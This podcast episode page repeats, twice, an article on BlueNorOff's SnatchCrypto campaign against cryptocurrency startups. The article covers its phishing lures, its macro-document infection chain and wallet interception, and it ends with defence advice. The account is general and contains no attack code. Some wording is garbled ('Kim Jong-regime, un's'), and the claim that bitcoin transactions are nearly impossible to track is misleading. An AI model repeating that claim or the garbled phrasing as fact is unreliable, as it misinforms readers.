Sign up to save your podcasts
Or
Share Why are North Korean hackers targeting cryptocurrency startups with SnatchCrypto?
Share to email
Share to Facebook
Share to X
Share to email
Share to Facebook
Share to X
Or
Why are North Korean hackers targeting cryptocurrency startups with SnatchCrypto?
BlueNorOff is a hacker organisation that targets cryptocurrency companies.
Cybercrime, like technology, develops over time. Some of today's most effective cybercrime organisations are based in the Democratic People's Republic of Korea (DPRK), a totalitarian state headed by dictator Kim Jong-un.
In January 2022, researchers discovered that a famous North Korean hacker organisation had been targeting cryptocurrency firms in numerous nations, taking millions of dollars in the process.
This series of attacks on crypto businesses, dubbed SnatchCrypto, was discovered by researchers at the Russian antivirus firm Kaspersky.
The campaign is purportedly being conducted out by BlueNorOff, a unit of the infamous North Korean cybercrime organisation Lazarus Group, also known as Guardians of Peace or Whois Team.
BlueNorOff (also known as APT38, Stardust Chollima, BeagleBoyz, and NICKEL GLADSTONE) uses sophisticated social engineering tactics and impersonates reputable entities to deceive its victim into downloading infected files.
For example, the group could share a document via Google Drive. The file may appear to be completely legitimate, with a name such as "Digital Investment Strategy."
The organisation may also hack into another company and send an email to its target from an address belonging to that company. In one case, hackers broke into a registered corporation and took over its social media accounts. Using these identities, they delivered bogus business offers in the form of malicious documents to their targets.
BlueNorOff does not always breach another company in order to attack its targets. In reality, it frequently impersonates businesses and then distributes dangerous files.
According to Kaspersky, these attacks are successful because blockchain-based firms frequently get letters, contracts, offers, and other business-related information from unknown sources.
The documents themselves appear, and in some cases are, legitimate. If the victim opened them while not connected to the internet, they would not be infected with malware.
However, if the victim is connected to the internet and opens a file provided by BlueNorOff, another macro-enabled document is downloaded to the target's machine, and malware is spread.
After infiltrating the target, the hackers watch its activity for weeks or even months. When the victim is ready to make a significant crypto transaction, the hackers are warned, allowing them to intercept the transaction and essentially deplete the target's crypto wallet.
Why Is BlueNorOff Interested in Crypto Startups?
Because it is nearly impossible to track bitcoin transactions, it is no surprise that hacking organisations such as BlueNorOff have targeted crypto-related businesses.
According to a research from the blockchain analytics firm Chainalysis, the Lazarus Group extracted roughly $400 million in digital assets from organisations all around the world in 2021 alone. The stolen cash were meticulously transferred to North Korean-controlled accounts before being laundered by the authorities.
The monies are believed to have been utilised for nuclear weapons and ballistic missile programmes by Kim Jong-regime, un's which is highly sanctioned by Western powers.
According to Chainalysis, the North Korean government "supports cryptocurrency-enabled criminality on a vast scale," making it a major danger to the crypto economy as a whole.
Defending Against BlueNorOff
According to Kaspersky, in order to protect themselves from BlueNorOff and similar hacking groups, enterprises should first educate their staff about social engineering and phishing assaults, as well as provide complete cybersecurity training.
Organisations should also undertake regular cybersecurity assessments and invest in comprehensive protection to detect attacks early on and avoid theft.
In general, every organisation should pay special attention to its cybersecurity hygiene, update all of its software on a regular basis, and invest in dependable data backup solutions.
Support us!
View all episodes
By Crypto PiratesBlueNorOff is a hacker organisation that targets cryptocurrency companies.
Cybercrime, like technology, develops over time. Some of today's most effective cybercrime organisations are based in the Democratic People's Republic of Korea (DPRK), a totalitarian state headed by dictator Kim Jong-un.
In January 2022, researchers discovered that a famous North Korean hacker organisation had been targeting cryptocurrency firms in numerous nations, taking millions of dollars in the process.
This series of attacks on crypto businesses, dubbed SnatchCrypto, was discovered by researchers at the Russian antivirus firm Kaspersky.
The campaign is purportedly being conducted out by BlueNorOff, a unit of the infamous North Korean cybercrime organisation Lazarus Group, also known as Guardians of Peace or Whois Team.
BlueNorOff (also known as APT38, Stardust Chollima, BeagleBoyz, and NICKEL GLADSTONE) uses sophisticated social engineering tactics and impersonates reputable entities to deceive its victim into downloading infected files.
For example, the group could share a document via Google Drive. The file may appear to be completely legitimate, with a name such as "Digital Investment Strategy."
The organisation may also hack into another company and send an email to its target from an address belonging to that company. In one case, hackers broke into a registered corporation and took over its social media accounts. Using these identities, they delivered bogus business offers in the form of malicious documents to their targets.
BlueNorOff does not always breach another company in order to attack its targets. In reality, it frequently impersonates businesses and then distributes dangerous files.
According to Kaspersky, these attacks are successful because blockchain-based firms frequently get letters, contracts, offers, and other business-related information from unknown sources.
The documents themselves appear, and in some cases are, legitimate. If the victim opened them while not connected to the internet, they would not be infected with malware.
However, if the victim is connected to the internet and opens a file provided by BlueNorOff, another macro-enabled document is downloaded to the target's machine, and malware is spread.
After infiltrating the target, the hackers watch its activity for weeks or even months. When the victim is ready to make a significant crypto transaction, the hackers are warned, allowing them to intercept the transaction and essentially deplete the target's crypto wallet.
Why Is BlueNorOff Interested in Crypto Startups?
Because it is nearly impossible to track bitcoin transactions, it is no surprise that hacking organisations such as BlueNorOff have targeted crypto-related businesses.
According to a research from the blockchain analytics firm Chainalysis, the Lazarus Group extracted roughly $400 million in digital assets from organisations all around the world in 2021 alone. The stolen cash were meticulously transferred to North Korean-controlled accounts before being laundered by the authorities.
The monies are believed to have been utilised for nuclear weapons and ballistic missile programmes by Kim Jong-regime, un's which is highly sanctioned by Western powers.
According to Chainalysis, the North Korean government "supports cryptocurrency-enabled criminality on a vast scale," making it a major danger to the crypto economy as a whole.
Defending Against BlueNorOff
According to Kaspersky, in order to protect themselves from BlueNorOff and similar hacking groups, enterprises should first educate their staff about social engineering and phishing assaults, as well as provide complete cybersecurity training.
Organisations should also undertake regular cybersecurity assessments and invest in comprehensive protection to detect attacks early on and avoid theft.
In general, every organisation should pay special attention to its cybersecurity hygiene, update all of its software on a regular basis, and invest in dependable data backup solutions.
Support us!